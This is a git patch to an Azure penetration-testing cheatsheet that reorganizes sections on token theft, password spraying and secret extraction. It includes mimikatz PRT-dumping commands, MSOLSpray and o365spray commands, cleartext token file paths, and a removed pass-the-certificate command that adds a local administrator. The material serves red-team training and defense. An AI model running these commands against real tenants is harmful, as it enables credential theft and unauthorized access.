From b8bec59c3c0e93c521475c9b29087a826d24f45c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 1 Dec 2023 14:57:00 +0100 Subject: [PATCH] Tokens Locations and References --- docs/README.md | 2 +- docs/cloud/azure/Cloud - Azure Pentest.md | 210 +-------------------- docs/cloud/azure/azure-access-and-token.md | 23 ++- docs/cloud/azure/azure-ad-connect.md | 26 ++- docs/cloud/azure/azure-devices-users-sp.md | 22 ++- docs/cloud/azure/azure-enumeration.md | 31 +-- docs/cloud/azure/azure-persistence.md | 7 +- docs/cloud/azure/azure-requirements.md | 3 +- docs/cloud/azure/azure-services.md | 52 ++++- 9 files changed, 144 insertions(+), 232 deletions(-) diff --git a/docs/README.md b/docs/README.md index 0176c2e..c9add6a 100644 --- a/docs/README.md +++ b/docs/README.md @@ -1,4 +1,4 @@ -# InternalAllTheThings +# πŸ“• InternalAllTheThings Active Directory and Internal Pentest Cheatsheets diff --git a/docs/cloud/azure/Cloud - Azure Pentest.md b/docs/cloud/azure/Cloud - Azure Pentest.md index 27c1995..c60ee5b 100644 --- a/docs/cloud/azure/Cloud - Azure Pentest.md +++ b/docs/cloud/azure/Cloud - Azure Pentest.md @@ -1,25 +1,3 @@ -# Cloud - Azure - -## Summary - -* [Azure Recon Tools](#azure-recon-tools) -* [Enumeration](#enumeration) - * [Enumeration methodology](#enumeration-methodology) -* [Token from Managed Identity](#token-from-managed-identity) - * [Refresh Tokens](#refresh-token) -* [Stealing Tokens](#stealing-tokens) - * [Stealing tokens from az cli](#stealing-tokens-from-az-cli) - * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell) -* [Pass The Certificate](#pass--the-certificate) -* [Pass The PRT](#pass-the-prt) -* [Deployment Template](#deployment-template) -* [Application Proxy](#application-proxy) -* [Azure AD](#azure-ad) - * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) - * [Convert GUID to SID](#convert-guid-to-sid) -* [Azure AD Connect](#azure-ad-connect) -* [References](#references) - ## Azure Recon Tools * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound @@ -171,190 +149,4 @@ # Administrator $ Create-Backdoor, Execute-Backdoor ``` -* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API - -## Token from Managed Identity - -### Refresh Tokens - -* https://github.com/ConstantinT/Lantern - ```powershell - Lantern.exe cookie --derivedkey --context --prt - Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename --outpfxfile - Lantern.exe token --username --password - Lantern.exe token --refreshtoken - Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password ) - ``` -* https://github.com/rvrsh3ll/TokenTactics - ```powershell - Import-Module .\TokenTactics.psd1 - CommandType Name Version Source - ----------- ---- ------- ------ - Function Clear-Token 0.0.1 TokenTactics - Function Dump-OWAMailboxViaMSGraphApi 0.0.1 TokenTactics - Function Forge-UserAgent 0.0.1 TokenTactics - Function Get-AzureToken 0.0.1 TokenTactics - Function Get-TenantID 0.0.1 TokenTactics - Function Open-OWAMailboxInBrowser 0.0.1 TokenTactics - Function Parse-JWTtoken 0.0.1 TokenTactics - Function RefreshTo-AzureCoreManagementToken 0.0.1 TokenTactics - Function RefreshTo-AzureManagementToken 0.0.1 TokenTactics - Function RefreshTo-DODMSGraphToken 0.0.1 TokenTactics - Function RefreshTo-GraphToken 0.0.1 TokenTactics - Function RefreshTo-MAMToken 0.0.1 TokenTactics - Function RefreshTo-MSGraphToken 0.0.1 TokenTactics - Function RefreshTo-MSManageToken 0.0.1 TokenTactics - Function RefreshTo-MSTeamsToken 0.0.1 TokenTactics - Function RefreshTo-O365SuiteUXToken 0.0.1 TokenTactics - Function RefreshTo-OfficeAppsToken 0.0.1 TokenTactics - Function RefreshTo-OfficeManagementToken 0.0.1 TokenTactics - Function RefreshTo-OutlookToken 0.0.1 TokenTactics - Function RefreshTo-SubstrateToken 0.0.1 TokenTactics - ``` - -## Stealing Tokens - -* Get-AzurePasswords - ```powershell - Import-Module Microburst.psm1 - Get-AzurePasswords - Get-AzurePasswords -Verbose | Out-GridView - ``` - -### Stealing tokens from az cli - -* az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\\.Azure` -* azureProfile.json in the same directory contains information about subscriptions. - -### Stealing tokens from az powershell - -* Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\\.Azure` -* It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json** -* Users can save tokens using `Save-AzContext` - - -## Pass The Certificate - -```ps1 -Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose -Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert - -# Require the PRT, TenantID, Context and DerivedKey -& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId --prt --userName @.onmicrosoft.com --hexCtx --hexDerivedKey -# PFX saved with the name @.onmicrosoft.com.pfx and password AzureADCert -``` - -Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine - -https://github.com/morRubin/AzureADJoinedMachinePTC - -```ps1 -Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP -Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10 - -python Main.py --usercert C:\Users\Username\Documents\username\@.onmicrosoft.com.pfx -- -certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add" -``` - - -## Deployment Template - -```powershell -PS Az> Get-AzResourceGroup -PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP - -# Export -PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName -cat .json # search for hardcoded password -cat | Select-String password -``` - -## Application Proxy - -```powershell -# Enumerate application that have Proxy -PS C:\Tools> Get-AzureADApplication -All $true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} -PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"} -PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1 -PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId -``` - -## Application Endpoint -```powershell -# Enumerate possible endpoints for applications starting/ending with PREFIX -PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls} -PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage -``` - - -## Azure AD - -With Microsoft, if you are using any cloud services (Office 365, Exchange Online, etc) with Active Directory (on-prem or in Azure) then an attacker is one credential away from being able to leak your entire Active Directory structure thanks to Azure AD. - -1. Authenticate to your webmail portal (i.e. https://webmail.domain.com/) -2. Change your browser URL to: https://azure.microsoft.com/ -3. Pick the account from the active sessions -4. Select Azure Active Directory and enjoy! - -### Azure AD vs Active Directory - -| Active Directory | Azure AD | -|---|---| -| LDAP | REST API'S | -| NTLM/Kerberos | OAuth/SAML/OpenID | -| Structured directory (OU tree) | Flat structure | -| GPO | No GPO's | -| Super fine-tuned access controls | Predefined roles | -| Domain/forest | Tenant | -| Trusts | Guests | - -* Password Hash Syncronization (PHS) - * Passwords from on-premise AD are sent to the cloud - * Use replication via a service account created by AD Connect -* Pass Through Authentication (PTA) - * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text -* Connect Windows Server AD to Azure AD using Federation Server (ADFS) - * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password - - -* Azure AD Joined : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large -* Workplace Joined : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large -* Hybrid Joined : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large -* Workplace joined on AADJ or Hybrid : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large - - -### Convert GUID to SID - -The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. - -```powershell -GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] -SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] -``` - -For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` - - -## References - -* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) -* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html) -* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/) -* [An introduction to penetration testing Azure - Akimbocore](https://akimbocore.com/article/introduction-to-pentesting-azure/) -* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) -* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) -* [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) -* [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) -* [Azure AD Overview](https://www.youtube.com/watch?v=l_pnNpdxj20) -* [Windows Azure Active Directory in plain English](https://www.youtube.com/watch?v=IcSATObaQZE) -* [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) -* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) -* [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) -* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) -* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) -* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) -* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) -* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric PalhiΓ¨re (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) -* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) -* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) -* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud) \ No newline at end of file +* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API \ No newline at end of file diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 6a11137..60847fe 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -199,6 +199,20 @@ Decode access tokens: [jwt.ms](https://jwt.ms/) ``` +### Access Token Locations + +Tokens are stored by default on the disk in you use **Azure Cloud Shell**. They canbe extracted by dumping the content of the storage account. + +* az cli + * az cli stores access tokens in clear text in **accessTokens.json** in the directory `C:\Users\\.Azure` + * azureProfile.json in the same directory contains information about subscriptions. + +* Az PowerShell + * Az PowerShell stores access tokens in clear text in **TokenCache.dat** in the directory `C:\Users\\.Azure` + * It also stores **ServicePrincipalSecret** in clear-text in **AzureRmContext.json** + * Users can save tokens using `Save-AzContext` + + ## Refresh Token * Requesting a token using credentials @@ -282,6 +296,7 @@ MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joine mimikatz # sekurlsa::cloudap mimikatz # sekurlsa::dpapi mimikatz # dpapi::cloudapkd /keyvalue: /unprotect + mimikatz # dpapi::cloudapkd /context: /derivedkey: /Prt: ``` * Use either roadtx or AADInternals to generate a new PRT token ```ps1 @@ -353,8 +368,14 @@ Use the user account to create a computer and request a PRT ## References +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema - April 16, 2020](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) * [Hacking Your Cloud: Tokens Edition 2.0 - Edwin David - April 13, 2023](https://trustedsec.com/blog/hacking-your-cloud-tokens-edition-2-0) * [Microsoft 365 Developer Program](https://developer.microsoft.com/en-us/microsoft-365/dev-program) * [PRT Abuse from Userland with Cobalt Strike - 0xbad53c](https://red.0xbad53c.com/red-team-operations/azure-and-o365/prt-abuse-from-userland-with-cobalt-strike) * [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94) -* [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert - AADInternals.com - September 01, 2020](https://aadinternals.com/post/prt/) \ No newline at end of file +* [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert - AADInternals.com - September 01, 2020](https://aadinternals.com/post/prt/) +* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html) +* [Attacking Azure Cloud shell - Karl Fosaaen - December 10, 2019](https://blog.netspi.com/attacking-azure-cloud-shell/) +* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597) +* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) +* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) \ No newline at end of file diff --git a/docs/cloud/azure/azure-ad-connect.md b/docs/cloud/azure/azure-ad-connect.md index 5846b8b..ff9bfd7 100644 --- a/docs/cloud/azure/azure-ad-connect.md +++ b/docs/cloud/azure/azure-ad-connect.md @@ -1,10 +1,25 @@ # Azure AD Connect +| Active Directory | Azure AD | +|-----------------------------------|-------------------| +| LDAP | REST API'S | +| NTLM/Kerberos | OAuth/SAML/OpenID | +| Structured directory (OU tree) | Flat structure | +| GPO | No GPO's | +| Super fine-tuned access controls | Predefined roles | +| Domain/forest | Tenant | +| Trusts | Guests | + Check if Azure AD Connect is installed : `Get-ADSyncConnector` * For **PHS**, we can extract the credentials -* For **PTA**, we can install the agent -* For **Federation**, we can extract the certificate from ADFS server using DA + * Passwords from on-premise AD are sent to the cloud + * Use replication via a service account created by AD Connect +* For **PTA**, we can attack the agent + * Possible to perform DLL injection into the PTA agent and intercept authentication requests: credentials in clear-text +* For **Federation**, connect Windows Server AD to Azure AD using Federation Server (ADFS) + * Dir-Sync : Handled by on-premise Windows Server AD, sync username/password + * extract the certificate from ADFS server using DA ## Password Hash Synchronization @@ -100,4 +115,9 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta ## References * [Introduction to Microsoft Entra Connect V2 - Microsoft](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-azure-ad-connect-v2) -* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory - Dirk-jan Mollema - 1st apr. 2019](https://www.youtube.com/watch?v=JEIR5oGCwdg) \ No newline at end of file +* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory - Dirk-jan Mollema - 1st apr. 2019](https://www.youtube.com/watch?v=JEIR5oGCwdg) +* [Impersonating Office 365 Users With Mimikatz - Michael Grafnetter - January 15, 2017](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) +* [Azure AD Overview - John Savill's Technical Training - Oct 7, 2014](https://www.youtube.com/watch?v=l_pnNpdxj20) +* [Windows Azure Active Directory in plain English - Openness AtCEE - Jan 9, 2014](https://www.youtube.com/watch?v=IcSATObaQZE) +* [Azure AD connect for RedTeam - Adam Chester @xpnsec - 2019-02-18](https://blog.xpnsec.com/azuread-connect-for-redteam/) +* [Azure AD Kerberos Tickets: Pivoting to the Cloud - Edwin David - February 09, 2023](https://trustedsec.com/blog/azure-ad-kerberos-tickets-pivoting-to-the-cloud) \ No newline at end of file diff --git a/docs/cloud/azure/azure-devices-users-sp.md b/docs/cloud/azure/azure-devices-users-sp.md index b141b05..2d02cf9 100644 --- a/docs/cloud/azure/azure-devices-users-sp.md +++ b/docs/cloud/azure/azure-devices-users-sp.md @@ -32,7 +32,6 @@ New-MgGroupMember -GroupId $groupid -DirectoryObjectid $targetmember ``` -### Use Credentials ### Dynamic Group Membership @@ -66,6 +65,17 @@ PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq " dsregcmd.exe /status Device Name : jumpvm ``` +* **Azure AD Joined** : https://pbs.twimg.com/media/EQZv62NWAAEQ8wE?format=jpg&name=large +* **Workplace Joined** : https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&name=large +* **Hybrid Joined** : https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&name=large +* **Workplace joined on AADJ or Hybrid** : https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&name=large + ### Join Devices @@ -125,7 +140,7 @@ Get-MgInformationProtectionBitlockerRecoveryKey -BitlockerRecoveryKeyId $bitlock ``` -# Service Principals +## Service Principals ## Other @@ -141,3 +156,6 @@ roadtx findscope -s https://graph.microsoft.com/mail.read ## References * [Pentesting Azure Mindmap](https://github.com/synacktiv/Mindmaps) +* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) +* [AZURE AD INTRODUCTION FOR RED TEAMERS - Aymeric PalhiΓ¨re (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) \ No newline at end of file diff --git a/docs/cloud/azure/azure-enumeration.md b/docs/cloud/azure/azure-enumeration.md index fd8f581..0131259 100644 --- a/docs/cloud/azure/azure-enumeration.md +++ b/docs/cloud/azure/azure-enumeration.md @@ -32,7 +32,7 @@ ``` -### Enumerate Email +### Enumerate Emails > By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. @@ -45,20 +45,28 @@ contact@.onmicrosoft.com - INVALID ``` * Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon + ```powershell + Install-Module MSOnline + Install-Module AzureAD + .\o365recon.ps1 -azure + ``` ### Password Spraying The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds. -```powershell -PS> git clone https://github.com/dafthack/MSOLSpray -PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1 -PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Verbose -PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 -PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! -``` - +* [dafthack/MSOLSpray](https://github.com/dafthack/MSOLSpray) + ```powershell + PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1 + PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Verbose + PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 + PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! + ``` +* [0xZDH/o365spray](https://github.com/0xZDH/o365spray) + ```powershell + o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com + ``` ## Azure Services Enumeration @@ -177,5 +185,6 @@ Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Reco ## References -* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/) -* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md) \ No newline at end of file +* [Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020](https://o365blog.com/post/mdm/) +* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md) +* [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) \ No newline at end of file diff --git a/docs/cloud/azure/azure-persistence.md b/docs/cloud/azure/azure-persistence.md index efcb9b9..f177cac 100644 --- a/docs/cloud/azure/azure-persistence.md +++ b/docs/cloud/azure/azure-persistence.md @@ -13,4 +13,9 @@ PS > $password = ConvertTo-SecureString '' -AsPlainText -Force PS > $creds = New-Object System.Management.Automation.PSCredential('', $password) PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '' - ``` \ No newline at end of file + ``` + + +## References + +* [Maintaining Azure Persistence via automation accounts - Karl Fosaaen - September 12, 2019](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) \ No newline at end of file diff --git a/docs/cloud/azure/azure-requirements.md b/docs/cloud/azure/azure-requirements.md index 2214600..3c59dda 100644 --- a/docs/cloud/azure/azure-requirements.md +++ b/docs/cloud/azure/azure-requirements.md @@ -25,4 +25,5 @@ ## References -* [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest) \ No newline at end of file +* [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest) +* [An introduction to penetration testing Azure - HollyGraceful - 06 August 2021](https://akimbocore.com/article/introduction-to-pentesting-azure/) \ No newline at end of file diff --git a/docs/cloud/azure/azure-services.md b/docs/cloud/azure/azure-services.md index f63ca2f..a487d21 100644 --- a/docs/cloud/azure/azure-services.md +++ b/docs/cloud/azure/azure-services.md @@ -127,8 +127,15 @@ Runbook must be **SAVED** and **PUBLISHED** before running it. PS Az> Get-AzKeyVaultSecret -VaultName -Name Reader -AsPlainText ``` +* Extract secrets from Automations, AppServices and KeyVaults + ```powershell + Import-Module Microburst.psm1 + PS Microburst> Get-AzurePasswords + PS Microburst> Get-AzurePasswords -Verbose | Out-GridView + ``` -## Azure Storage Blob + +## Storage Blob * Blobs - `*.blob.core.windows.net` * File Services - `*.file.core.windows.net` @@ -164,7 +171,7 @@ PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount :warning: You can also use `subscription`(username/password) to access storage resources such as blobs and files. -## Azure Web App +## Web Apps ### SSH Connection @@ -172,6 +179,43 @@ PS Az> Get-AzStorageBlobContent -Container -Context (Get-AzStorageAccount az webapp create-remote-connection --subscription --resource-group -n ``` +## Application Endpoint + +* Enumerate possible endpoints for applications starting/ending with PREFIX + ```powershell + PS C:\Tools> Get-AzureADServicePrincipal -All $true -Filter "startswith(displayName,'PREFIX')" | % {$_.ReplyUrls} + PS C:\Tools> Get-AzureADApplication -All $true -Filter "endswith(displayName,'PREFIX')" | Select-Object ReplyUrls,WwwHomePage,HomePage + ``` + + +## Application Proxy + +* Enumerate applications that have Proxy + ```powershell + PS C:\Tools> Get-AzureADApplication -All $true | %{try{GetAzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}} + PS C:\Tools> Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Finance Management System"} + + PS C:\Tools> . C:\Tools\GetApplicationProxyAssignedUsersAndGroups.ps1 + PS C:\Tools> Get-ApplicationProxyAssignedUsersAndGroups -ObjectId + ``` + + +## Deployment Template + +* List the deployments + ```powershell + PS Az> Get-AzResourceGroup + PS Az> Get-AzResourceGroupDeployment -ResourceGroupName SAP + ``` +* Export the deployment template + ```ps1 + PS Az> Save-AzResourceGroupDeploymentTemplate -ResourceGroupName -DeploymentName + + # search for hardcoded password + cat .json + cat | Select-String password + ``` + ## Azure Devops @@ -259,4 +303,6 @@ Get-MgDrive -top 1 * [Microsoft Graph - servicePrincipal: addPassword](https://learn.microsoft.com/en-us/graph/api/serviceprincipal-addpassword?view=graph-rest-1.0&tabs=powershell) * [Microsoft Intune - Microsoft Intune support for Windows LAPS](https://learn.microsoft.com/en-us/mem/intune/protect/windows-laps-overview) -* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps) \ No newline at end of file +* [Pentesting Azure Mindmap - Alexis Danizan](https://github.com/synacktiv/Mindmaps) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/) \ No newline at end of file